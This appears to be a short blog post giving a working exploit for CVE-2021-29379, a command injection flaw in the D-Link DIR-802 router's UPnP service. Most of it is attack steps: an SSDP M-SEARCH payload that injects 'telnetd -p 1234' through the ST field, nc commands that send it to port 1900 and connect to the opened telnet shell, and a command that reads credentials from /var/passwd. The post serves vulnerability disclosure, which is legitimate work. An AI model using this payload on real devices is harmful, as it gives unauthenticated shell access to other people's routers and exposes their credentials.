CVE-2021-29379 D-Link DIR-802 UPnP M-SEARCH Command Injection Vulnerability

Introduction

Authentication can be bypassed on D-Link DIR-802 A1 by injecting a payload into the Search Target (ST) field of the SSDP M-SEARCH discover packet.

Exploit

Create a text file with SSDP M-SEARCH payload to inject command to start telnet service on port 1234.

M-SEARCH * HTTP/1.1
HOST:192.168.0.1:1900
ST:urn:schemas-upnp-org:service:WANIPConnection:1;telnetd -p 1234
MX:2
MAN:"ssdp:discover"

Send the payload to UPnP UDP port 1900 using nc.

nc -u 192.168.0.1 1900 < payload.txt


Connect to telnet service on TCP port 1234. 

nc -v 192.168.0.1 1234

View the credentials from file /var/passwd.

cat /var/passwd


Video



Comments

Popular posts from this blog

Extract / Create Cramfs File System from Ubuntu 20.04

Dump memory to file from U-Boot console using Memory Display (md) log

Firmadyne Installation & Emulation of Firmware